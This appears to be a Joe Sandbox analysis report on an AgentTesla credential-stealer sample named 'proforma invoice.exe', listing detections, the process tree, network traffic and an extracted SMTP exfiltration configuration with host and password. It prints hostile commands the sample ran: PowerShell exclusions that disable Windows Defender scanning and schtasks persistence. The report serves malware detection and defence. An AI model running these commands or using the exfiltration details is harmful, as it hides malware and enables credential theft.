Edit tour

Windows Analysis Report
proforma invoice.exe

Overview

General Information

Sample name:	proforma invoice.exe
Analysis ID:	1571276
MD5:	4cd97c3af5dc22901fae8c5851719ede
SHA1:	ee483928af409dc7c12265a631f04a324793c2db
SHA256:	b46e55db0693853f1f96a8ba2baad879f4e700db1c976a4041427ed221538922
Tags:	exeuser-adrian__luca
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Yara detected AgentTesla

Yara detected AntiVM3

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Contains functionality to log keystrokes (.Net Source)

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Outbound SMTP Connections

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

proforma invoice.exe (PID: 7852 cmdline: "C:\Users\user\Desktop\proforma invoice.exe" MD5: 4CD97C3AF5DC22901FAE8C5851719EDE)

powershell.exe (PID: 8056 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\proforma invoice.exe" MD5: 3F92A35BA26FF7A11A49E15EFE18F0C2)

conhost.exe (PID: 8064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 7366FBEFE66BA0F1F5304F7D6FEF09FE)

powershell.exe (PID: 8108 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\CGWlZD.exe" MD5: 3F92A35BA26FF7A11A49E15EFE18F0C2)

conhost.exe (PID: 8132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 7366FBEFE66BA0F1F5304F7D6FEF09FE)

WmiPrvSE.exe (PID: 5828 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 8172 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CGWlZD" /XML "C:\Users\user\AppData\Local\Temp\tmp4844.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 7366FBEFE66BA0F1F5304F7D6FEF09FE)

proforma invoice.exe (PID: 7644 cmdline: "C:\Users\user\Desktop\proforma invoice.exe" MD5: 4CD97C3AF5DC22901FAE8C5851719EDE)

CGWlZD.exe (PID: 7140 cmdline: "C:\Users\user\AppData\Roaming\CGWlZD.exe" MD5: 4CD97C3AF5DC22901FAE8C5851719EDE)

schtasks.exe (PID: 2860 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CGWlZD" /XML "C:\Users\user\AppData\Local\Temp\tmp6458.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 7366FBEFE66BA0F1F5304F7D6FEF09FE)

CGWlZD.exe (PID: 8100 cmdline: "C:\Users\user\AppData\Roaming\CGWlZD.exe" MD5: 4CD97C3AF5DC22901FAE8C5851719EDE)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "25", "Host": "mail.iaa-airferight.com", "Username": "web@iaa-airferight.com", "Password": "webmaster"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000009.00000002.2578053721.000000000042F000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.2578053721.000000000042F000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000009.00000002.2580742665.00000000032AC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000009.00000002.2580742665.0000000003281000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.2580742665.0000000003281000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000E.00000002.2581503168.0000000002D2C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000E.00000002.2581503168.0000000002D01000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000002.2581503168.0000000002D01000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.1365596647.00000000040A9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1365596647.00000000040A9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: proforma invoice.exe PID: 7852	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: proforma invoice.exe PID: 7852	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: proforma invoice.exe PID: 7852	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: proforma invoice.exe PID: 7644	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: proforma invoice.exe PID: 7644	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: CGWlZD.exe PID: 7140	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: CGWlZD.exe PID: 8100	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: CGWlZD.exe PID: 8100	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 13 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.proforma invoice.exe.416aec8.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.proforma invoice.exe.416aec8.2.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.proforma invoice.exe.416aec8.2.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x316ef:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x31761:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x317eb:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x3187d:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x318e7:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x31959:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x319ef:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x31a7f:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.proforma invoice.exe.4370698.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.proforma invoice.exe.4370698.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.proforma invoice.exe.4370698.0.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.proforma invoice.exe.4370698.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0xb210f:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0xb2181:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0xb220b:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0xb229d:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0xb2307:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0xb2379:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0xb240f:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0xb249f:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.proforma invoice.exe.42f1a78.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.proforma invoice.exe.42f1a78.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.proforma invoice.exe.42f1a78.1.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.proforma invoice.exe.42f1a78.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x130d2f:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x130da1:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x130e2b:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x130ebd:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x130f27:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x130f99:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x13102f:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x1310bf:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.proforma invoice.exe.416aec8.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.proforma invoice.exe.416aec8.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.proforma invoice.exe.416aec8.2.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.proforma invoice.exe.416aec8.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x334ef:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x2b78df:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33561:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x2b7951:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x335eb:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x2b79db:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x3367d:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x2b7a6d:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x336e7:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x2b7ad7:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33759:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x2b7b49:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x337ef:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x2b7bdf:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3387f:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x2b7c6f:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Click to see the 10 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\proforma invoice.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\proforma invoice.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\proforma invoice.exe", ParentImage: C:\Users\user\Desktop\proforma invoice.exe, ParentProcessId: 7852, ParentProcessName: proforma invoice.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\proforma invoice.exe", ProcessId: 8056, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CGWlZD" /XML "C:\Users\user\AppData\Local\Temp\tmp6458.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CGWlZD" /XML "C:\Users\user\AppData\Local\Temp\tmp6458.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\CGWlZD.exe", ParentImage: C:\Users\user\AppData\Roaming\CGWlZD.exe, ParentProcessId: 7140, ParentProcessName: CGWlZD.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CGWlZD" /XML "C:\Users\user\AppData\Local\Temp\tmp6458.tmp", ProcessId: 2860, ProcessName: schtasks.exe

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 46.175.148.58, DestinationIsIpv6: false, DestinationPort: 25, EventID: 3, Image: C:\Users\user\Desktop\proforma invoice.exe, Initiated: true, ProcessId: 7644, Protocol: tcp, SourceIp: 192.168.2.3, SourceIsIpv6: false, SourcePort: 49736

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CGWlZD" /XML "C:\Users\user\AppData\Local\Temp\tmp4844.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CGWlZD" /XML "C:\Users\user\AppData\Local\Temp\tmp4844.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\proforma invoice.exe", ParentImage: C:\Users\user\Desktop\proforma invoice.exe, ParentProcessId: 7852, ParentProcessName: proforma invoice.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CGWlZD" /XML "C:\Users\user\AppData\Local\Temp\tmp4844.tmp", ProcessId: 8172, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\proforma invoice.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\proforma invoice.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\proforma invoice.exe", ParentImage: C:\Users\user\Desktop\proforma invoice.exe, ParentProcessId: 7852, ParentProcessName: proforma invoice.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\proforma invoice.exe", ProcessId: 8056, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CGWlZD" /XML "C:\Users\user\AppData\Local\Temp\tmp4844.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CGWlZD" /XML "C:\Users\user\AppData\Local\Temp\tmp4844.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\proforma invoice.exe", ParentImage: C:\Users\user\Desktop\proforma invoice.exe, ParentProcessId: 7852, ParentProcessName: proforma invoice.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CGWlZD" /XML "C:\Users\user\AppData\Local\Temp\tmp4844.tmp", ProcessId: 8172, ProcessName: schtasks.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: proforma invoice.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://mail.iaa-airferight.com

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\CGWlZD.exe

Avira: detection malicious, Label: HEUR/AGEN.1305708

Found malware configuration

Source: 0.2.proforma invoice.exe.416aec8.2.raw.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "25", "Host": "mail.iaa-airferight.com", "Username": "web@iaa-airferight.com", "Password": "webmaster"}

Multi AV Scanner detection for domain / URL

Source: mail.iaa-airferight.com	Virustotal: Detection: 8%			Perma Link
Source: http://mail.iaa-airferight.com	Virustotal: Detection: 8%			Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\CGWlZD.exe

ReversingLabs: Detection: 65%

Multi AV Scanner detection for submitted file

Source: proforma invoice.exe	ReversingLabs: Detection: 65%
Source: proforma invoice.exe	Virustotal: Detection: 56%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\CGWlZD.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: proforma invoice.exe

Joe Sandbox ML: detected

Source: proforma invoice.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.3:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.3:49742 version: TLS 1.2

Source: proforma invoice.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Yara detected Generic Downloader

Source: Yara match	File source: 0.2.proforma invoice.exe.4370698.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.proforma invoice.exe.42f1a78.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.proforma invoice.exe.416aec8.2.raw.unpack, type: UNPACKEDPE

Source: Joe Sandbox View	IP Address: 46.175.148.58 46.175.148.58
Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205

Source: Joe Sandbox View

ASN Name: ASLAGIDKOM-NETUA ASLAGIDKOM-NETUA

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: global traffic

TCP traffic: 192.168.2.3:49736 -> 46.175.148.58:25

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: mail.iaa-airferight.com

Source: proforma invoice.exe, 00000009.00000002.2580742665.00000000032AC000.00000004.00000800.00020000.00000000.sdmp, CGWlZD.exe, 0000000E.00000002.2581503168.0000000002D2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.iaa-airferight.com
Source: proforma invoice.exe, 00000000.00000002.1344796057.00000000028AA000.00000004.00000800.00020000.00000000.sdmp, proforma invoice.exe, 00000009.00000002.2580742665.0000000003231000.00000004.00000800.00020000.00000000.sdmp, CGWlZD.exe, 0000000A.00000002.1421648447.00000000033FA000.00000004.00000800.00020000.00000000.sdmp, CGWlZD.exe, 0000000E.00000002.2581503168.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: proforma invoice.exe, CGWlZD.exe.0.dr	String found in binary or memory: http://www.elderscrolls.com/skyrim/character
Source: proforma invoice.exe, CGWlZD.exe.0.dr	String found in binary or memory: http://www.elderscrolls.com/skyrim/characterT
Source: CGWlZD.exe, 0000000A.00000002.1421648447.00000000033FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.elderscrolls.com/skyrim/player
Source: proforma invoice.exe, 00000000.00000002.1365596647.00000000040A9000.00000004.00000800.00020000.00000000.sdmp, proforma invoice.exe, 00000009.00000002.2578053721.000000000042F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
Source: proforma invoice.exe, 00000000.00000002.1365596647.00000000040A9000.00000004.00000800.00020000.00000000.sdmp, proforma invoice.exe, 00000009.00000002.2578053721.000000000042F000.00000040.00000400.00020000.00000000.sdmp, proforma invoice.exe, 00000009.00000002.2580742665.0000000003231000.00000004.00000800.00020000.00000000.sdmp, CGWlZD.exe, 0000000E.00000002.2581503168.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: proforma invoice.exe, 00000009.00000002.2580742665.0000000003231000.00000004.00000800.00020000.00000000.sdmp, CGWlZD.exe, 0000000E.00000002.2581503168.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: proforma invoice.exe, 00000009.00000002.2580742665.0000000003231000.00000004.00000800.00020000.00000000.sdmp, CGWlZD.exe, 0000000E.00000002.2581503168.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/t

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728

Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.3:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.3:49742 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 0.2.proforma invoice.exe.416aec8.2.raw.unpack, abAX9N.cs

.Net Code: OPnJT

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.proforma invoice.exe.416aec8.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.proforma invoice.exe.4370698.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.proforma invoice.exe.42f1a78.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.proforma invoice.exe.416aec8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: proforma invoice.exe

Source: C:\Users\user\Desktop\proforma invoice.exe	Code function: 0_2_00AD2530	0_2_00AD2530
Source: C:\Users\user\Desktop\proforma invoice.exe	Code function: 0_2_00AD0871	0_2_00AD0871
Source: C:\Users\user\Desktop\proforma invoice.exe	Code function: 0_2_00AD1360	0_2_00AD1360
Source: C:\Users\user\Desktop\proforma invoice.exe	Code function: 0_2_00AD34B8	0_2_00AD34B8
Source: C:\Users\user\Desktop\proforma invoice.exe	Code function: 0_2_00AD1B89	0_2_00AD1B89
Source: C:\Users\user\Desktop\proforma invoice.exe	Code function: 0_2_00AD9B84	0_2_00AD9B84
Source: C:\Users\user\Desktop\proforma invoice.exe	Code function: 0_2_00AD9CF8	0_2_00AD9CF8
Source: C:\Users\user\Desktop\proforma invoice.exe	Code function: 0_2_00AD43BB	0_2_00AD43BB
Source: C:\Users\user\Desktop\proforma invoice.exe	Code function: 0_2_00AD43C0	0_2_00AD43C0
Source: C:\Users\user\Desktop\proforma invoice.exe	Code function: 0_2_00ADA330	0_2_00ADA330
Source: C:\Users\user\Desktop\proforma invoice.exe	Code function: 0_2_00AD4F18	0_2_00AD4F18
Source: C:\Users\user\Desktop\proforma invoice.exe	Code function: 0_2_00AD4F14	0_2_00AD4F14
Source: C:\Users\user\Desktop\proforma invoice.exe	Code function: 0_2_00AD33A8	0_2_00AD33A8
Source: C:\Users\user\Desktop\proforma invoice.exe	Code function: 0_2_00AD5588	0_2_00AD5588
Source: C:\Users\user\Desktop\proforma invoice.exe	Code function: 0_2_00AD57E0	0_2_00AD57E0
Source: C:\Users\user\Desktop\proforma invoice.exe	Code function: 0_2_00AD57D1	0_2_00AD57D1
Source: C:\Users\user\Desktop\proforma invoice.exe	Code function: 0_2_00AD5A40	0_2_00AD5A40
Source: C:\Users\user\Desktop\proforma invoice.exe	Code function: 0_2_00AD9CE8	0_2_00AD9CE8
Source: C:\Users\user\Desktop\proforma invoice.exe	Code function: 0_2_09460370	0_2_09460370
Source: C:\Users\user\Desktop\proforma invoice.exe	Code function: 0_2_09463810	0_2_09463810
Source: C:\Users\user\Desktop\proforma invoice.exe	Code function: 0_2_09464080	0_2_09464080
Source: C:\Users\user\Desktop\proforma invoice.exe	Code function: 0_2_09460360	0_2_09460360
Source: C:\Users\user\Desktop\proforma invoice.exe	Code function: 0_2_094633D8	0_2_094633D8
Source: C:\Users\user\Desktop\proforma invoice.exe	Code function: 0_2_094633AA	0_2_094633AA
Source: C:\Users\user\Desktop\proforma invoice.exe	Code function: 0_2_09463C48	0_2_09463C48
